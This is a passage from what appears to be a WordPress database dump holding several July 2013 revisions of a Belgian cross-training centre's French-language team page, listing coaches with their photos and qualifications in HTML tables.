padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-22', '', '', '2013-07-03 19:39:55', '2013-07-03 19:39:55', '', 20, 'http://www.crosstrainingcenter.be/?p=244', 0, 'revision', '', 0),
(245, 1, '2013-07-03 19:41:42', '2013-07-03 19:41:42', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-23', '', '', '2013-07-03 19:41:42', '2013-07-03 19:41:42', '', 20, 'http://www.crosstrainingcenter.be/?p=245', 0, 'revision', '', 0),
(246, 1, '2013-07-03 19:42:52', '2013-07-03 19:42:52', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-24', '', '', '2013-07-03 19:42:52', '2013-07-03 19:42:52', '', 20, 'http://www.crosstrainingcenter.be/?p=246', 0, 'revision', '', 0),
(247, 1, '2013-07-03 19:44:26', '2013-07-03 19:44:26', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-25', '', '', '2013-07-03 19:44:26', '2013-07-03 19:44:26', '', 20, 'http://www.crosstrainingcenter.be/?p=247', 0, 'revision', '', 0),
(248, 1, '2013-07-03 19:47:43', '2013-07-03 19:47:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting Formateur coach</h5>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-26', '', '', '2013-07-03 19:47:43', '2013-07-03 19:47:43', '', 20, 'http://www.crosstrainingcenter.be/?p=248', 0, 'revision', '', 0),
(249, 1, '2013-07-03 19:48:41', '2013-07-03 19:48:41', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting<br>\r\nFormateur coach<br>\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	